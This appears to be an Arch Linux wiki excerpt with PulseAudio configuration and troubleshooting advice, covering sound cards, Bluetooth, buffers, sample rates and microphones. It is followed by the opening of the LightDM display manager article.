Additionally, the {{AUR|kdeplasma-applets-veromix}} is available in the [[AUR]] as a KDE alternative to KMix or pavucontrol.<br />
<br />
If KMix/Veromix fail to connect to PulseAudio at boot you may need to edit {{ic|/etc/pulse/client.conf}} to include {{ic|autospawn &#61; yes}} instead of {{ic|autospawn &#61; no}}.<br />
<br />
=== Xfce ===<br />
<br />
Applications running under Xfce can take advantage of PulseAudio. To manage PulseAudio settings you can use {{Pkg|pavucontrol}}.<br />
<br />
== Applications ==<br />
<br />
=== Audacious ===<br />
<br />
[[Audacious]] natively supports PulseAudio. In order to use it, set Audacious Preferences -> Audio -> Current output plugin to 'PulseAudio Output Plugin'.<br />
<br />
=== Java/OpenJDK 6 ===<br />
<br />
Create a wrapper for the java executable using padsp as seen on the [[Java#Java_sound_with_Pulseaudio|Java sound with Pulseaudio]] page.<br />
<br />
=== Music Player Daemon (MPD) ===<br />
<br />
[http://mpd.wikia.com/wiki/PulseAudio configure] [[MPD]] to use PulseAudio. See also [[MPD/Tips and Tricks#MPD and PulseAudio]].<br />
<br />
=== MPlayer ===<br />
<br />
[[MPlayer]] natively supports PulseAudio output with the "{{ic|-ao pulse}}" option. It can also be configured to default to PulseAudio output, in {{ic|~/.mplayer/config}} for per-user, or {{ic|/etc/mplayer/mplayer.conf}} for system-wide:<br />
{{hc|/etc/mplayer/mplayer.conf|2=ao=pulse}}<br />
<br />
=== Skype (x86_64 only) ===<br />
<br />
Install {{Pkg|lib32-libpulse}}, otherwise the following error will occur when trying to initiate a call: "Problem with Audio Playback".<br />
<br />
== Troubleshooting ==<br />
<br />
=== No sound after install ===<br />
<br />
==== Muted audio device ====<br />
<br />
If one experiences no audio output via any means while using ALSA, attempt to unmute the sound card. To do this, launch {{ic|alsamixer}} and make sure each column has a green 00 under it (this can be toggled by pressing {{ic|m}}):<br />
$ alsamixer -c 0<br />
<br />
{{Note|alsamixer will not tell you which output device is set as the default. One possible cause of no sound after install is that pulseaudio detects the wrong output device as a default. Install {{Pkg|pavucontrol}} and check if there is any output on the pavucontrol panel when playing a ''.wav'' file.}}<br />
<br />
==== Auto-Mute Mode ====<br />
<br />
Auto-Mute Mode may be enabled. It can be disabled using {{ic|alsamixer}}.<br />
<br />
See http://superuser.com/questions/431079/how-to-disable-auto-mute-mode for more.<br />
<br />
==== Bad configuration files ====<br />
<br />
If after starting pulseaudio, the system outputs no sound, it may be necessary to delete the contents of {{ic|~/.pulse}}. Pulseaudio will automatically create new configuration files on its next start.<br />
<br />
==== Flash content ====<br />
<br />
Since Adobe Flash does not directly support PulseAudio the recommended way is to [https://wiki.archlinux.org/index.php/PulseAudio#ALSA configure ALSA to use the virtual PulseAudio soundcard].<br />
<br />
Alternatively you may try out {{AUR|libflashsupport-pulse}} from the [[AUR]].<br />
{{Note|This may invariably crash the flash plugin.}}<br />
<br />
==== No cards ====<br />
<br />
If PulseAudio starts, run {{ic|pacmd list}}. If no cards are reported, make sure that the ALSA devices are not in use:<br />
$ fuser -v /dev/snd/*<br />
$ fuser -v /dev/dsp<br />
<br />
Make sure any applications using the pcm or dsp files are shut down before restarting PulseAudio.<br />
<br />
==== The only device shown is "dummy output" ====<br />
<br />
This may be caused by different reasons, one of them being the {{ic|.asoundrc}} file in $HOME is taking precedence over the systemwide {{ic|/etc/asound.conf}}.<br />
<br />
The user file is modified also by the tool {{ic|asoundconf}} or by its graphical variant {{ic|asoundconf-gtk}} (the latter is named "Default sound card" in the menu) as soon as it runs. Prevent the effects of {{ic|.asoundrc}} altogether by commenting the last line like this:<br />
{{hc|.asoundrc|<br />
# </home/''yourusername''/.asoundrc.asoundconf><br />
}}<br />
<br />
Maybe some program is monopolizing the audio device:<br />
{{hc|# fuser -v /dev/snd/*|<br />
USER PID ACCESS COMMAND<br />
/dev/snd/controlC0: root 931 F.... timidity<br />
bob 1195 F.... panel-6-mixer<br />
/dev/snd/controlC1: bob 1195 F.... panel-6-mixer<br />
bob 1215 F.... pulseaudio<br />
/dev/snd/pcmC0D0p: root 931 F...m timidity<br />
/dev/snd/seq: root 931 F.... timidity<br />
/dev/snd/timer: root 931 f.... timidity<br />
}}<br />
<br />
That means timidity blocks pulseaudio from accessing the audio devices. Just killing timidity will make the sound work again.<br />
<br />
Another reason is [[FluidSynth]] conclicting with pulseaudio as discussed in [https://bbs.archlinux.org/viewtopic.php?id=154002 this thread]. The solution is to remove FluidSynth:<br />
<br />
# pacman -Rnsc fluidsynth<br />
<br />
==== KDE4 ====<br />
<br />
It may be that another output device set as preferred in phonon. Make sure that every setting reflects the preferred output device at the top, and check the playback streams tab in {{ic|kmix}} to make sure that applications are using the device for output.<br />
<br />
To see your default audio device, you can run:<br />
<br />
pactl stat<br />
<br />
To see available audio devices:<br />
<br />
pactl list<br />
<br />
To set your default audio device use "pacmd" or add to /etc/pulse/default.pa:<br />
set-default-sink alsa_output.analog-stereo<br />
<br />
==== Failed to create sink input: sink is suspended ====<br />
<br />
If you do not have any output sound and receive dozens of errors related to a suspended sink in your {{ic|journalctl -b}} log, then backup first and then delete your user-specific pulse folders:<br />
<br />
$ rm -r ~/.pulse ~/.pulse-cookie<br />
<br />
=== No HDMI sound output after some time with the monitor turned off ===<br />
<br />
The monitor is connected via HDMI/DisplayPort, and the audio jack is plugged in the headphone jack of the monitor, but pulseaudio insists that it's unplugged:<br />
{{hc|pactl list sinks|<br />
...<br />
hdmi-output-0: HDMI / DisplayPort (priority: 5900, not available)<br />
...<br />
}}<br />
<br />
This leads to no sound coming from HDMI output. A workaround for this is to switch to another TTY and back again. This problem has been reported by ATI/Nvidia/Intel users.<br />
<br />
=== Can't update configuration of sound device in pavucontrol ===<br />
<br />
{{Pkg|pavucontrol}} is a handy GUI utility for configuring pulseaudio. Under its 'Configuration' tab, you can select different profiles for each of your sound devices e.g. analogue stereo, digital output (IEC958), HDMI 5.1 Surround etc.<br />
<br />
However, you may run into an instance where selecting a different profile for a card results in the pulse daemon crashing and auto restarting without the new selection "sticking". If this occurs, use the other useful GUI tool, {{Pkg|paprefs}}, to check under the "Simultaneous Output" tab for a virtual simultaneous device. If this setting is active (checked), it will prevent you changing any card's profile in pavucontrol. Uncheck this setting, then adjust your profile in pavucontrol prior to re-enabling simultaneous output in paprefs.<br />
<br />
=== Simultaneous output to multiple sound cards / devices ===<br />
<br />
Simultaneous output to two different devices can be very useful. For example, being able to send audio to your A/V receiver via your graphics card's HDMI output, while also sending the same audio through the analogue output of your motherboard's built-in audio. This is much less hassle than it used to be (in this example, we are using GNOME desktop).<br />
<br />
Using {{Pkg|paprefs}}, simply select "Add virtual output device for simultaneous output on all local sound cards" from under the "Simultaneous Output" tab. Then, under GNOME's "sound settings", select the simultaneous output you have just created.<br />
<br />
If this doesn't work, try adding the following to {{ic|~/.asoundrc}}:<br />
<br />
pcm.dsp {<br />
type plug<br />
slave.pcm "dmix"<br />
}<br />
<br />
=== Simultaneous output to multiple sinks on the same sound card not working===<br />
This can be useful for users who have multiple sound sources and want to play them on different sinks/outputs. <br />
An example use-case for this would be if you play music and also voice chat and want to output music to speakers (in this case Digital S/PDIF) and voice to headphones. (Analog)<br />
<br />
This is sometimes auto detected by pulseaudio but not always. If you know that your soundcard can output to both Analog and S/PDIF at the same time and pulseaudio does not have this option in it's profiles in pavucontrol, or veromix then you probably need to create a configuration file for your soundcard.<br />
<br />
More in detail you need to create a profile-set for your specific soundcard.<br />
This is done in two steps mostly.<br />
*Create udev rule to make pulseaudio choose your pulseaudio configuration file specific to the soundcard.<br />
* Create the actual configuration.<br />
<br />
Create a pulseadio udev rule.<br />
{{Note| This is only an example for Asus Xonar Essence STX.<br />
Read [[udev]] to find out the correct values.}}<br />
{{Note| Your configuration file should have lower number than the original pulseaudio rule to take effect.}}<br />
{{hc|/usr/lib/udev/rules.d/90-pulseaudio-Xonar-STX.rules|<br />
ACTION&#61;&#61;"change", SUBSYSTEM&#61;&#61;"sound", KERNEL&#61;&#61;"card*", \<br />
ATTRS&#123;subsystem_vendor&#125;&#61;&#61;"0x1043", ATTRS&#123;subsystem_device&#125;&#61;&#61;"0x835c", ENV&#123;PULSE_PROFILE_SET&#125;&#61;"asus-xonar-essence-stx.conf" <br />
}}<br />
<br />
Create now a configuration file. If you bother you can start from scratch and make if saucy. However you can also use the default configuration file rename it and then add your profile there that you know works. Less pretty but also faster.<br />
<br />
To enable multiple sinks for Asus Xonar Essence STX you need only to add this in.<br />
{{Note|{{ic|asus-xonar-essence-stx.conf}} also includes all code/mappings from {{ic|default.conf}}.}}<br />
{{hc|/usr/share/pulseaudio/alsa-mixer/profile-sets/asus-xonar-essence-stx.conf|<br />
[Profile analog-stereo+iec958-stereo]<br />
description &#61; Analog Stereo Duplex + Digital Stereo Output<br />
input-mappings &#61; analog-stereo<br />
output-mappings &#61; analog-stereo iec958-stereo<br />
skip-probe &#61; yes<br />
}}<br />
<br />
This will auto-profile your Asus Xonar Essence STX with default profiles and add your own profile so you can have multiple sinks.<br />
<br />
You need to create another profile in the configuration file if you want to have the same functionality with AC3 Digital 5.1 output.<br />
<br />
[https://www.freedesktop.org/wiki/Software/PulseAudio/Backends/ALSA/Profiles/ See pulseaudio article about profiles]<br />
<br />
=== Disable Bluetooth support ===<br />
<br />
If you do not use Bluetooth you may experience the following error in your journal:<br />
<br />
bluez5-util.c: GetManagedObjects() failed: org.freedesktop.DBus.Error.ServiceUnknown: The name org.bluez was not provided by any .service files<br />
<br />
To disable Bluetooth support in PulseAudio, make sure that the following lines are commented out in the configuration file in use ({{ic|~/.config/pulse/default.pa}} or {{ic|/etc/pulse/default.pa}}):<br />
<br />
{{hc|~/.config/pulse/default.pa|<br />
### Automatically load driver modules for Bluetooth hardware<br />
#.ifexists module-bluetooth-policy.so<br />
#load-module module-bluetooth-policy<br />
#.endif<br />
<br />
#.ifexists module-bluetooth-discover.so<br />
#load-module module-bluetooth-discover<br />
#.endif<br />
}}<br />
<br />
=== Bluetooth headset replay problems ===<br />
<br />
Some user [https://bbs.archlinux.org/viewtopic.php?id=117420 report] huge delays or even no sound when the bluetooth connection does not send any data. This is due to the {{ic|module-suspend-on-idle}} module, which automatically suspends sinks/sources on idle. As this can cause problems with headset, the responsible module can be deactivated.<br />
<br />
To disable loading of the {{ic|module-suspend-on-idle}} module, comment out the following line in the configuration file in use ({{ic|~/.config/pulse/default.pa}} or {{ic|/etc/pulse/default.pa}}):<br />
<br />
{{hc|~/.config/pulse/default.pa|<br />
### Automatically suspend sinks/sources that become idle for too long<br />
#load-module module-suspend-on-idle<br />
}}<br />
<br />
Finally restart PulseAudio to apply the changes.<br />
<br />
=== Automatically switch to Bluetooth or USB headset ===<br />
<br />
Add the following:<br />
{{hc|/etc/pulse/default.pa|<br />
# automatically switch to newly-connected devices<br />
load-module module-switch-on-connect<br />
}}<br />
<br />
=== Pulse overwrites ALSA settings ===<br />
<br />
Pulseaudio usually overwrites the ALSA settings- for example set with alsamixer- at start up, even when the alsa daemon is loaded. Since there seems to be no other way to restrict this behaviour, a workaround is to restore the alsa settings again after pulseaudio had started. Add the following command to {{ic|.xinitrc}} or {{ic|.bash_profile}} or any other [[Autostarting|autostart]] file:<br />
<br />
restore_alsa() {<br />
while [ -z "$(pidof pulseaudio)" ]; do<br />
sleep 0.5<br />
done<br />
alsactl -f /var/lib/alsa/asound.state restore <br />
}<br />
restore_alsa &<br />
<br />
=== Prevent Pulse from restarting after being killed ===<br />
<br />
Sometimes you may wish to temporarily disable Pulse. In order to do so you will have to prevent Pulse from restarting after being killed.<br />
<br />
{{hc|~/.config/pulse/client.conf|2=<br />
# Disable autospawning the PulseAudio daemon<br />
autospawn = no<br />
}}<br />
<br />
=== Daemon startup failed ===<br />
<br />
Try resetting PulseAudio:<br />
$ rm -rf /tmp/pulse* ~/.pulse*<br />
$ pulseaudio -k<br />
$ pulseaudio --start<br />
<br />
If there is no server running but pulseaudio fails to start with an error message "User-configured server at ... refusing to start/autospawn", the issue may be with PulseAudio settings from a previous login. Check to see if there are any stale properties attached to the X11 root window with {{ic|pax11publish -d}}, and if there are, remove them with {{ic|pax11publish -r}} before trying to start the server. This manual cleanup is always required when using LXDM because it does not restart the X server on logout; see [[LXDM#PulseAudio]].<br />
<br />
==== inotify issue ====<br />
<br />
If the previous fix doesn't work, see if you get an error like this:<br />
{{hc|$ pulseaudio -vvvv|<br />
E: [pulseaudio] module-udev-detect.c: You apparently ran out of inotify watches, probably because Tracker/Beagle took them all away. I wished people would do their homework first and fix inotify before using it for watching whole directory trees which is something the current inotify is certainly not useful for. Please make sure to drop the Tracker/Beagle guys a line complaining about their broken use of inotify.<br />
}}<br />
<br />
In which case you have run out of inotify watches. <br />
<br />
This can quickly be resolved by:<br />
# echo 100000 > /proc/sys/fs/inotify/max_user_watches<br />
<br />
To have it permanently changed, use:<br />
{{hc|/etc/sysctl.d/99-sysctl.conf|2=<br />
# Increase inotify max watchs per user<br />
fs.inotify.max_user_watches = 100000<br />
}}<br />
<br />
=== padevchooser ===<br />
<br />
If one cannot launch the PulseAudio Device Chooser, first restart the Avahi daemon ('''avahi-daemon''').<br />
<br />
=== Glitches, skips or crackling ===<br />
<br />
The newer implementation of PulseAudio sound server uses a timer-based audio scheduling instead of the traditional interrupt-driven approach. <br />
<br />
Timer-based scheduling may expose issues in some ALSA drivers. On the other hand, other drivers might be glitchy without it on, so check to see what works on your system. <br />
<br />
To turn timer-based scheduling off add {{ic|1=tsched=0}} in {{ic|/etc/pulse/default.pa}}:<br />
{{hc|/etc/pulse/default.pa|<nowiki><br />
load-module module-udev-detect tsched=0<br />
</nowiki>}}<br />
<br />
Then restart the PulseAudio server:<br />
$ pulseaudio -k<br />
$ pulseaudio --start<br />
<br />
Do the reverse to enable timer-based scheduling, if not already enabled by default.<br />
<br />
Please report any such cards to [http://pulseaudio.org/wiki/BrokenSoundDrivers PulseAudio Broken Sound Driver page]<br />
<br />
=== Setting the default fragment number and buffer size in Pulseaudio ===<br />
<br />
[http://forums.linuxmint.com/viewtopic.php?f=42&t=44862 More Information]<br />
<br />
==== Finding out your audio device parameters (1/4) ====<br />
<br />
To find your sound card buffering settings:<br />
$ echo autospawn = no >> ~/.pulse/client.conf<br />
$ pulseaudio -k<br />
$ LANG=C timeout --foreground -k 10 -s kill 10 pulseaudio -vvvv 2>&1 | grep device.buffering -B 10<br />
$ sed -i '$d' ~/.pulse/client.conf<br />
<br />
For each sound card detected by Pulseaudio, you will see output similar to this:<br />
I: [pulseaudio] source.c: alsa.long_card_name = "HDA Intel at 0xfa200000 irq 46"<br />
I: [pulseaudio] source.c: alsa.driver_name = "snd_hda_intel"<br />
I: [pulseaudio] source.c: device.bus_path = "pci-0000:00:1b.0"<br />
I: [pulseaudio] source.c: sysfs.path = "/devices/pci0000:00/0000:00:1b.0/sound/card0"<br />
I: [pulseaudio] source.c: device.bus = "pci"<br />
I: [pulseaudio] source.c: device.vendor.id = "8086"<br />
I: [pulseaudio] source.c: device.vendor.name = "Intel Corporation"<br />
I: [pulseaudio] source.c: device.product.name = "82801I (ICH9 Family) HD Audio Controller"<br />
I: [pulseaudio] source.c: device.form_factor = "internal"<br />
I: [pulseaudio] source.c: device.string = "front:0"<br />
I: [pulseaudio] source.c: device.buffering.buffer_size = "768000"<br />
I: [pulseaudio] source.c: device.buffering.fragment_size = "384000"<br />
<br />
Take note the buffer_size and fragment_size values for the relevant sound card.<br />
<br />
==== Calculate your fragment size in msecs and number of fragments (2/4) ====<br />
<br />
Pulseaudio's default sampling rate and bit depth are set to {{ic|44100Hz}} @ {{ic|16 bits}}.<br />
<br />
With this configuration, the bit rate we need is {{ic|44100}}*{{ic|16}} = {{ic|705600 bits per second. That's {{ic|1411200 bps}} for stereo.<br />
<br />
Let's take a look at the parameters we've found in the previous step:<br />
<br />
device.buffering.buffer_size = "768000" => 768000/1411200 = 0.544217687075s = 544 msecs<br />
device.buffering.fragment_size = "384000" => 384000/1411200 = 0.272108843537s = 272 msecs<br />
<br />
==== Modify Pulseaudio's configuration file (3/4) ====<br />
<br />
{{hc|/etc/pulse/daemon.conf|<nowiki><br />
; default-fragments = X<br />
; default-fragment-size-msec = Y<br />
</nowiki>}}<br />
<br />
In the previous step, we calculated the fragment size parameter.<br />
The number of fragments is simply buffer_size/fragment_size, which in this case ({{ic|544/272}}) is {{ic|2}}:<br />
<br />
{{hc|/etc/pulse/daemon.conf|<nowiki><br />
; default-fragments = '''272'''<br />
; default-fragment-size-msec = '''2'''<br />
</nowiki>}}<br />
<br />
==== Restart the Pulseaudio daemon (4/4) ====<br />
<br />
$ pulseaudio -k<br />
$ pulseaudio --start<br />
<br />
For more information, see: [http://forums.linuxmint.com/viewtopic.php?f=42&t=44862 Linux Mint topic]<br />
<br />
=== Laggy sound ===<br />
<br />
This issue is due to incorrect buffer sizes.<br />
<br />
Either disable any modifications (if any) to these entries, or, if issue still exists, uncomment:<br />
{{hc|/etc/pulse/daemon.conf|<nowiki><br />
default-fragments = 8<br />
default-fragment-size-msec = 5<br />
</nowiki>}}<br />
<br />
=== Choppy, overdriven sound ===<br />
<br />
Choppy sound in pulsaudio can result from wrong settings for the sample rate. Try:<br />
{{hc|/etc/pulse/daemon.conf|<nowiki><br />
default-sample-rate = 48000<br />
</nowiki>}}<br />
and restart the PulseAudio server.<br />
<br />
If one experiences choppy sound in applications using openAL, change the sample rate in {{ic|/etc/openal/alsoft.conf}}:<br />
frequency = 48000<br />
<br />
Setting the PCM volume above 0dB can cause clipping of the audio signal. Running {{ic|alsamixer -c0}} will allow you to see if this is the problem and if so fix it.<br />
<br />
=== Volume adjustment does not work properly ===<br />
<br />
Check:<br />
{{ic|/usr/share/pulseaudio/alsa-mixer/paths/analog-output.conf.common}}<br />
<br />
If the volume does not appear to increment/decrement properly using {{ic|alsamixer}} or {{ic|amixer}}, it may be due to pulseaudio having a larger number of increments (65537 to be exact). Try using larger values when changing volume (e.g. {{ic|amixer set Master 655+}}).<br />
<br />
=== Volume gets louder every time a new application is started ===<br />
<br />
Per default, it seems as if changing the volume in an application sets the global system volume to that level instead of only affecting the respective application. Applications setting their volume on startup will therefore cause the system volume to "jump".<br />
<br />
Fix this by:<br />
{{hc|/etc/pulse/daemon.conf|<nowiki><br />
flat-volumes = no<br />
</nowiki>}}<br />
and then restarting PulseAudio by executing<br />
$ pulseaudio -k && pulseaudio --start<br />
<br />
When Pulse comes back after a few seconds, applications will not alter the global system volume anymore but have their own volume level again.<br />
<br />
{{Note|A previously installed and removed pulseaudio-equalizer may leave behind remnants of the setup in {{ic|~/.pulse/default.pa}} which can also cause maximized volume trouble. Comment that out as needed.}}<br />
<br />
=== No mic on ThinkPad T400/T500/T420 ===<br />
<br />
Run:<br />
alsamixer -c 0<br />
Maximize the volume of/unmute the "Internal Mic".<br />
<br />
Once you see the device with:<br />
arecord -l<br />
you might still need to adjust the settings. The microphone and the audio jack are duplexed. Set the configuration of the internal audio in pavucontrol to ''Analog Stereo Duplex''.<br />
<br />
=== No mic input on Acer Aspire One ===<br />
<br />
Install pavucontrol, unlink the microphone channels and turn down the left one to 0.<br />
Reference: http://getsatisfaction.com/jolicloud/topics/deaf_internal_mic_on_acer_aspire_one#reply_2108048<br />
<br />
=== Sound output is only mono on M-Audio Audiophile 2496 sound card ===<br />
<br />
Add the following:<br />
{{hc|/etc/pulseaudio/default.pa|<nowiki><br />
load-module module-alsa-sink sink_name=delta_out device=hw:M2496 format=s24le channels=10 channel_map=left,right,aux0,aux1,aux2,aux3,aux4,aux5,aux6,aux7<br />
load-module module-alsa-source source_name=delta_in device=hw:M2496 format=s24le channels=12 channel_map=left,right,aux0,aux1,aux2,aux3,aux4,aux5,aux6,aux7,aux8,aux9<br />
set-default-sink delta_out<br />
set-default-source delta_in<br />
</nowiki>}}<br />
<br />
=== Static noise in microphone recording ===<br />
<br />
If we are getting static noise in skype, gnome-sound-recorder, arecord, etc.'s recordings then the sound card samplerate is incorrect. That is why there is static noise in linux microphone recordings. To fix this We need to set sample-rate in {{ic|/etc/pulse/daemon.conf}} for the sound hardware.<br />
<br />
==== Determine soundcards in the system (1/5) ====<br />
<br />
This requires alsa-utils and related packages to be installed:<br />
{{hc|$ arecord --list-devices|<br />
**** List of CAPTURE Hardware Devices ****<br />
card 0: Intel [HDA Intel], device 0: ALC888 Analog [ALC888 Analog]<br />
Subdevices: 1/1<br />
Subdevice #0: subdevice #0<br />
card 0: Intel [HDA Intel], device 2: ALC888 Analog [ALC888 Analog]<br />
Subdevices: 1/1<br />
Subdevice #0: subdevice #0<br />
}}<br />
<br />
Sound card is {{ic|hw:0,0}}.<br />
<br />
==== Determine sampling-rate of the sound card (2/5) ====<br />
{{hc|arecord -f dat -r 60000 -D hw:0,0 -d 5 test.wav|<br />
"Recording WAVE 'test.wav' : Signed 16 bit Little Endian, Rate 60000 Hz, Stereo<br />
Warning: rate is not accurate (requested = 60000Hz, '''got = 96000Hz''')<br />
please, try the plug plugin<br />
}}<br />
<br />
observe, the {{ic|got = 96000Hz}}. This is the max sample-rate of our card.<br />
<br />
==== Setting the soundcard's sampling rate into pulse audio configuration (3/5) ====<br />
<br />
The default sample-rate in pulseaudio:<br />
{{hc|$ grep "default-sample-rate" /etc/pulse/daemon.conf|<br />
; default-sample-rate = 44100<br />
}}<br />
<br />
{ic|44100}} is disabled and needs to be changed to {{ic|96000}}:<br />
# sed 's/; default-sample-rate = 44100/default-sample-rate = 96000/g' -i /etc/pulse/daemon.conf<br />
<br />
==== Restart pulseaudio to apply the new settings (4/5) ====<br />
<br />
$ pulseaudio -k<br />
$ pulseaudio --start<br />
<br />
==== Finally check by recording and playing it back (5/5) ====<br />
<br />
Let us record some voice using mic for say 10 seconds. Make sure the mic is not muted and all<br />
$ arecord -f cd -d 10 test-mic.wav<br />
<br />
After 10 seconds, let us play the recording...<br />
$ aplay test-mic.wav<br />
<br />
Now hopefully, there is no static noise in microphone recording anymore.<br />
<br />
=== My Bluetooth device is paired but does not play any sound ===<br />
<br />
[[Bluetooth#My_device_is_paired_but_no_sound_is_played_from_it|See the article in Bluetooth section]]<br />
<br />
Starting from PulseAudio 2.99 and bluez 4.101 you should '''avoid''' using Socket interface. Do NOT use:<br />
{{hc|/etc/bluetooth/audio.conf|<nowiki><br />
[General]<br />
Enable=Socket<br />
</nowiki>}}<br />
If you face problems with A2DP and PA 2.99 make sure you have {{Pkg|sbc}} library.<br />
<br />
=== Subwoofer stops working after end of every song ===<br />
<br />
Known issue: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/494099<br />
<br />
To fix this, must edit: {{ic|/etc/pulse/daemon.conf}} and enable {{ic|enable-lfe-remixing}} :<br />
{{hc|/etc/pulse/daemon.conf|<nowiki><br />
enable-lfe-remixing = yes<br />
</nowiki>}}<br />
<br />
=== Pulseaudio uses wrong microphone ===<br />
<br />
If Pulseaudio uses the wrong microphone, and changing the Input Device with Pavucontrol did not help, take a look at alsamixer. It seems that Pavucontrol does not always set the input source correctly.<br />
<br />
$ alsamixer<br />
<br />
Press {{ic|F6}} and choose your sound card, e.g. HDA Intel. Now press {{ic|F5}} to display all items. Try to find the item: {{ic|Input Source}}. With the up/down arrow keys you are able to change the input source.<br />
<br />
Now try if the correct microphone is used for recording.<br />
<br />
=== Choppy Sound with Analog Surround Sound Setup ===<br />
<br />
The low-frequency effects (LFE) channel is not remixed per default. To enable it the following needs to be set in {{ic|/etc/pulse/daemon.conf}} :<br />
{{hc|/etc/pulse/daemon.conf|<nowiki><br />
enable-lfe-remixing = yes<br />
</nowiki>}}<br />
<br />
=== No sound below a volume cutoff ===<br />
<br />
Known issue (won't fix): https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/223133<br />
<br />
If sound doesn't play when Pulseaudio's volume is set below a certain level, try {{ic|1=ignore_dB=1}} in {{ic|/etc/pulse/default.pa}}:<br />
{{hc|/etc/pulse/default.pa|<nowiki><br />
load-module module-udev-detect ignore_dB=1<br />
</nowiki>}}<br />
<br />
However, be aware that it may cause another bug preventing pulseaudio to unmute speakers when headphones or other audio devices are unplugged.<br />
<br />
=== Low volume for internal mic ===<br />
<br />
If you experience low volume on internal notebook microphone, try setting:<br />
{{hc|/etc/pulse/default.pa|<nowiki><br />
set-source-volume 1 300000<br />
</nowiki>}}<br />
<br />
=== Clients alter master output volume (aka volume jumps to 100% after running application) ===<br />
<br />
If changing volume in specific applications changes also master output volume you can try to diasble flat volumes. Set:<br />
{{hc|/etc/pulse/daemon.conf|<nowiki><br />
flat-volumes = no<br />
</nowiki>}}<br />
Then restart Pulseaudio daemon:<br />
# pulseaudio -k<br />
# pulseaudio --start<br />
<br />
===Realtime scheduling===<br />
If rtkit doesn't work, you can manually set up your system to run PulseAudio with realtime scheduling, which can help performance. To do this, add the following lines to {{ic|/etc/security/limits.conf}}:<br />
@pulse-rt - rtprio 9<br />
@pulse-rt - nice -11<br />
<br />
Afterwards, you need to add your user to the {{ic|pulse-rt}} group:<br />
# gpasswd -a <user> pulse-rt<br />
<br />
<br />
<br />
=== No sound after resume from suspend ===<br />
<br />
If audio generally works, but stops after resume from suspend, try "reloading" PulseAudio by executing:<br />
$ /usr/bin/pasuspender /bin/true<br />
<br />
This is better than completely killing and restarting it ({{ic|pulseaudio -k && pulseaudio --start`}}), because it doesn't break already running applications.<br />
<br />
If the above fixes your problem, you may wish to automate it, by creating a systemd service file.<br />
<br />
1. Create the template service file in {{ic|/etc/systemd/system/resume-fix-pulseaudio@.service}}:<br />
<br />
[Unit]<br />
Description=Fix PulseAudio after resume from suspend<br />
After=suspend.target<br />
<br />
[Service]<br />
User=%I<br />
Type=oneshot<br />
Environment="XDG_RUNTIME_DIR=/run/user/%U"<br />
ExecStart=/usr/bin/pasuspender /bin/true<br />
<br />
[Install]<br />
WantedBy=suspend.target<br />
<br />
2. Enable it for your user account<br />
<br />
# systemctl enable resume-fix-pulseaudio@YOUR_USERNAME_HERE.service<br />
<br />
3. Reload systemd<br />
<br />
# systemctl --system daemon-reload<br />
<br />
=== ALSA Channels Mute When Headphones Are Plugged/Unplugged Improperly ===<br />
If when you unplug your headphones or plug them in the audio remains muted in alsamixer on the wrong channel due to it being set to 0%, you may be able to fix it by opening /etc/pulse/default.pa and commenting out the line:<br />
load-module module-switch-on-port-available<br />
<br />
=== pactl "invalid option" error with negative percentage arguments ===<br />
{{ic|pactl}} commands that take negative percentage arguments will fail with an 'invalid option' error. Use the standard shell '--' pseudo argument<br />
to disable argument parsing before the negative argument. ''e.g.'' {{ic|pactl set-sink-volume 1 -- -5%}}.<br />
<br />
== See also ==<br />
* [http://www.alsa-project.org/main/index.php/Asoundrc http://www.alsa-project.org/main/index.php/Asoundrc] - Alsa wiki on .asoundrc<br />
* [http://www.pulseaudio.org/ http://www.pulseaudio.org/] - PulseAudio official site<br />
* [http://www.pulseaudio.org/wiki/FAQ http://www.pulseaudio.org/wiki/FAQ] - PulseAudio FAQ</div>Wakehttps://wiki.archlinux.org/index.php?title=LightDM&diff=289123LightDM2013-12-18T14:52:02Z<p>Wake: /* Optional configuration and Tweaks */ Last session saved in .dmrc</p>
<hr />
<div>[[Category:Display managers]]<br />
[[es:LightDM]]<br />
[[fr:LightDM]]<br />
{{Article summary start}}<br />
{{Article summary text|Provides an overview and setup of the Light Display Manager.}}<br />
{{Article summary heading|Related}}<br />
{{Article summary wiki|Display Manager}}<br />
{{Article summary wiki|GDM}}<br />
{{Article summary wiki|KDM}}<br />
{{Article summary wiki|SLiM}}<br />
{{Article summary end}}<br />
<br />
[http://www.freedesktop.org/wiki/Software/LightDM LightDM] is a cross-desktop [[Display_Manager|display manager]] that aims to be the standard display manager for the X server. Its key features are:<br />
* A lightweight codebase<br />
* Standards compliant (PAM, logind, etc)<br />
* A well defined interface between the server and the user interface.<br />
* Cross-desktop (user interfaces can be written in any toolkit).<br />
<br />
More details about LightDM's design can be found [http://www.freedesktop.org/wiki/Software/LightDM/Design here].<br />
<br />
== Installation ==<br />
Install {{Pkg|lightdm}} from the [[official repositories]]. You can also install {{AUR|lightdm-devel}} for the development branch or {{AUR|lightdm-bzr}} from the [[AUR]].<br />
<br />
=== Greeter===<br />
You will also need to install a greeter (a user interface for LightDM). The reference greeter is ''lightdm-gtk-greeter'', which is provided by {{Pkg|lightdm-gtk2-greeter}} or {{Pkg|lightdm-gtk3-greeter}}. KDE users can install {{Pkg|lightdm-kde-greeter}}, a greeter based on Qt.<br />
<br />
Other greeters can be installed from the [[AUR]] as well: <br />
* {{AUR|lightdm-another-gtk-greeter}}: A GTK3 greeter with custom theme support<br />
* {{AUR|lightdm-webkit-greeter}}: A greeter that uses Webkit for theming.<br />
* {{AUR|lightdm-crowd-greeter}}: A 3D greeter that lets you select your profile from 3D characters walking around.<br />
* {{AUR|lightdm-unity-greeter}}: The greeter used by Ubuntu's [[Unity]].<br />
* {{AUR|lightdm-razor-greeter}}: A greeter for the [[Razor-qt]] desktop environment.<br />
* {{AUR|lightdm-pantheon-greeter}}: A greeter from the ElementaryOS Project.<br />
<br />
You can change the default greeter by changing the configuration file to state:<br />
{{hc|/etc/lightdm/lightdm.conf|<br />
greeter-session&#61;lightdm-yourgreeter-greeter<br />
}}<br />
<br />
== Enabling LightDM ==<br />
Make sure that the '''lightdm''' daemon is [[Systemd#Running_DMs_under_systemd|started]] at boot:<br />
<br />
# systemctl enable lightdm<br />
<br />
== Command line tool ==<br />
LightDM offers a command line tool, {{ic|dm-tool}}, which can be used to lock the current seat, switch sessions, etc, which is useful with 'minimalist' window managers and for testing. To see a list of available commands, execute:<br />
$ dm-tool --help<br />
<br />
== Testing ==<br />
First, [[Pacman|install]] {{Pkg|xorg-server-xephyr}} from the [[official repositories]].<br />
<br />
Then, run LightDM as an X application:<br />
$ lightdm --test-mode --debug<br />
<br />
